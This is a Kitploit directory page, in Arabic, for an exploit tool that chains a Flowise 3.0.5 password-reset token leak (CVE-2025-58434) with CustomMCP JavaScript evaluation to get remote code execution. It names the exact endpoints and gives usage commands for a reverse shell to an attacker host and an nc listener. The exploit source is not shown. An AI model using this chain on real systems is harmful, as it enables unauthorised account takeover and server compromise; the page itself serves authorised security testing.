Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-58434 — سلسلة استغلال لـ Flowise 3.0.5: استيلاء غير مصادق عليه على الحساب عبر كشف رمز إعادة تعيين كلمة المرور (CVE-2025-58434) مقترنًا بتقييم JavaScript الخاص بـ CustomMCP لتنفيذ التعليمات البرمجية عن بُعد. | Kitploit
أدوات/GitHubGitHub/r3vpwnx/cve-2025-58434
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالمصادقةالفريق الأحمر
GitHubr3vpwnx/cve-2025-58434

CVE-2025-58434

سلسلة استغلال لـ Flowise 3.0.5: استيلاء غير مصادق عليه على الحساب عبر كشف رمز إعادة تعيين كلمة المرور (CVE-2025-58434) مقترنًا بتقييم JavaScript الخاص بـ CustomMCP لتنفيذ التعليمات البرمجية عن بُعد.

عرض المستودع
1منذ يوم واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-58434 - استيلاء غير مصادق عليه على حساب Flowise، متسلسل مع ثغرة CustomMCP RCE

مشكلتان في Flowise 3.0.5، متسلسلتان:

  1. CVE-2025-58434 - كشف رمز إعادة تعيين كلمة المرور. يُرجع POST /api/v1/account/forgot-password رمز tempToken الخاص بالمستخدم المستهدف مباشرةً في استجابة JSON. قم بإدخاله في POST /api/v1/account/reset-password لتعيين كلمة مرور معروفة لأي حساب، بما في ذلك أول مسؤول -> استيلاء كامل غير مصادق عليه على الحساب.
  2. تقييم JavaScript من جانب الخادم لـ mcpServerConfig في CustomMCP. باستخدام جلسة ومفتاح API الخاص بمساحة العمل (من الخطوة 1)، يقوم POST /api/v1/node-load-method/customMCP مع loadMethod=listActions بتقييم سلسلة mcpServerConfig كـ JavaScript في عملية Flowise، مما يتيح تنفيذ أوامر عن بُعد عبر require('child_process').exec(). (مشكلة Flowise منفصلة تُستخدم هنا فقط لتحويل الاستيلاء على الحساب إلى تنفيذ كود؛ لم يُخصص لها CVE وقت كتابة هذا التقرير.)

CVE: CVE-2025-58434

المتطلبات

root@kitploit:~
python3 -m pip install requests

الاستخدام

flowise_ato_foothold.py - السلسلة الكاملة (استيلاء على الحساب -> مفتاح API -> قشرة عكسية عبر CustomMCP)

root@kitploit:~
python3 flowise_ato_foothold.py <LHOST> <LPORT> [TARGET_IP] [FLOWISE_VHOST]
# جهّز `nc -lvnp <LPORT>` مسبقًا

flowise_customMCP_rce.py - ثغرة CustomMCP RCE فقط (تتطلب مفتاح API)

root@kitploit:~
python3 flowise_customMCP_rce.py '<command>' '<FLOWISE_API_KEY>'

المراجع

  • https://github.com/FlowiseAI/Flowise/security/advisories
  • NVD: CVE-2025-58434

إخلاء مسؤولية

لأغراض الاختبار الأمني المصرح به والتعليم فقط. شغّل هذا فقط ضد أنظمة تملكها أو لديك إذن كتابي صريح لاختبارها.


المؤلف: r3vpwnx

تنزيل الأداة